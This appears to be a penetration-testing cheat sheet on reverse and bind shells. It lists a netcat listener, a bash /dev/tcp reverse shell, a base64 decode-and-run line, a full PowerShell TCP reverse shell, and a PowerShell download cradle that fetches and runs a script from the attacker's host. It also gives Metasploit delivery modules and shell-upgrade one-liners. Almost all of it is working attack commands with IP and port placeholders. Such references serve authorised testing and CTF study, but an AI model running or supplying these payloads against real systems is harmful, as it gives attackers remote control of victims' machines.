Reverse & Bind Shells

Listener

nc -nlvp <PORT>

Public to the world

ngrok tcp <PORT>

Main

/bin/bash -c 'bash -i>&/dev/tcp/<myIP>/<myPORT> 0>&1';

echo "<PayloadBASE64>" | base64 -d | sh

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell -enc <PayloadBASE64>

With Invoke-PowerShellTcp.ps1 on attacker machine and adding at the end Invoke-PowerShellTcp -Reverse -IPAddress <MY_IP> -Port <MY_PORT> On the victim

powershell IEX(New-Object Net.Webclient).downloadString('http://<MY_IP>:<MY_PORT>/Invoke-PowerShellTcp.ps1')

exploit/multi/script/web_delivery

exploit/windows/smb/smb_delivery

TTY

Description

Command

Bash

/bin/bash -i

Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

Perl

perl —e 'exec "/bin/sh";' perl: exec "/bin/sh";

Ruby

ruby: exec "/bin/sh"

Lua

lua: os.execute('/bin/sh')

AWK

awk 'BEGIN {system("/bin/sh")}'

penelope

Shell handler with auto-upgrade shells to PTY

<CTRL+Z>
stty raw -echo 
fg

Last updated 2 months ago